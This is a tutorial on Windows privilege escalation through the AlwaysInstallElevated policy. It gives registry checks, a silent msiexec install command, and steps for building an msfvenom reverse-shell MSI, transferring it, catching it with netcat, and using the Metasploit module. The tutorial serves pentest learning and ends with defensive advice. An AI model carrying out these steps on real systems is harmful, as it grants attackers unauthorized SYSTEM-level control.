Windows Privilege Escalation – AlwaysInstallElevated Policy
Introduction
The Windows installer is a utility which through the use MSI packages can install new software. The AlwaysInstallElevated is a Windows policy that allows unprivileged users to install software through the use of MSI packages using SYSTEM level permissions, which can be exploited to gain administrative access over a Windows machine.
This option is equivalent to granting full SYSTEM rights, which can pose a massive security risk. Microsoft strongly discourages the use of this setting.
The Attack
If a machine has the AlwaysInstallElevated policy enabled, an attacker could craft a malicious .msi package and run it using SYSTEM level privileges, therefore executing arbitrary code as SYSTEM.
For this attack to work, the “AlwaysInstallElevated” value in following Registry keys has to be set to 1:
- HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
- HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
Example
The first step is to check whether the required registry keys are enabled:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
This can also be checked with automated scripts such as WinPEAS:
winpeas.exe quiet systeminfo
For this example, a reverse shell can be generated using MSFvenom, with the following flags:
- -p to specify the payload type, in this case the Windows reverse TCP shell
- LHOST to specify the local host IP address to connect to
- LPORT to specify the local port to connect to
- -f to specify the format, in this case msi
Transferring the shell.msi file to the Windows victim machine using the Python web server and the Windows Certutil utility.
The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip the DNS lookup
- -p to specify the port to listen on
The following command can then be used to install the .msi file:
msiexec /quiet /qn /i file.msi
The flags used are for the following:
- /quiet – quiet mode, which means there’s no user interaction required
- /qn – specifies there’s no UI during the installation process
- Specifies normal installation
Once the package is installed, the malicious code is executed, granting SYSTEM level access to the system through a reverse shell.
Metasploit Exploitation
This vulnerability can also be exploited by using the always_install_elevated Metasploit module.
Once a meterpreter shell is obtained, all that is required is to brackground the session, search for and set the module, set the session value and run it:
This has granted a SYSTEM level shell. Always try and perform the attack in a manual fashion first, especially when practicing it for the first time.
Conclusion
Because this policy permits users to install applications that require access to restricted directories and registry keys system administrators should consider whether it provides users with an appropriate level of security.
When it is not set, applications are instead installed using the user’s privileges and only managed applications get elevated privileges.